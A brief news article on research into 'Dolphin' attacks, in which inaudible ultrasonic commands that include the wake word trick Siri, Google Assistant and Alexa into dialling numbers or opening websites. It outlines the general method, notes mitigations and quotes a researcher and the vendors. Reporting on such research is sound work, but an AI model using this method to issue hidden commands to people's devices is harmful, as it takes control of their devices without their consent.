Home News Lifestyle “Dolphin” attacks can trick voice assistants

“Dolphin” attacks can trick voice assistants

Research teams work out hacking method for AI voice assistants

931
0
Siri vs Google Voice
Siri vs Google Voice

Voice assistants are one of the better Living In The Future developments of recent years, allowing you to control various things in your house and on your phone with only your own dulcet tones. But as with any new tech, there are kinks to work out, and researchers have found a way to hack the machines.

The Amazon, Google and Apple assistants have all been found to respond to commands broadcast in ultrasonic frequencies that can be heard by dolphins but not humans. A Chinese research team has reported being able to make smartphones with the assistants enabled dial phone numbers and visit websites. Additionally, an American team working on a separate study has been able to activate the Amazon Echo smart speaker using the same method. The latter said the attack worked because the target machine’s microphone processed the audio and interpreted it as being human speech.

“After processing this ultrasound, the microphone’s recording… is quite similar to the normal voice,” they said in a research paper.

As long as attackers use each assistant’s key phrase that acts as a wake word (“OK Google”, “Hey Siri” for Apple or “Alexa” for Amazon), the malicious controlling works. It is worth noting, though, that Google’s assistant can be set up to only work for one person’s voice, Siri requires a smartphone to be unlocked before performing activities such as visiting websites, and both Siri and Google’s wake word feature can be turned off.

“Although the devices are not designed to handle ultrasound, if you put something just outside the range of human hearing, the assistant can still receive it so it’s certainly possible,” said Dr Steven Murdoch, a cyber-security researcher at University College London.

“Whether it’s realistic is another question. At the moment there’s not a great deal of harm that could be caused by the attack. Smart speakers are designed not to do harmful things. I would expect the smart speaker vendors will be able to do something about it and ignore the higher frequencies.”

Google and Amazon have both released statements saying they’re investigating the claims made in the researchers’ papers.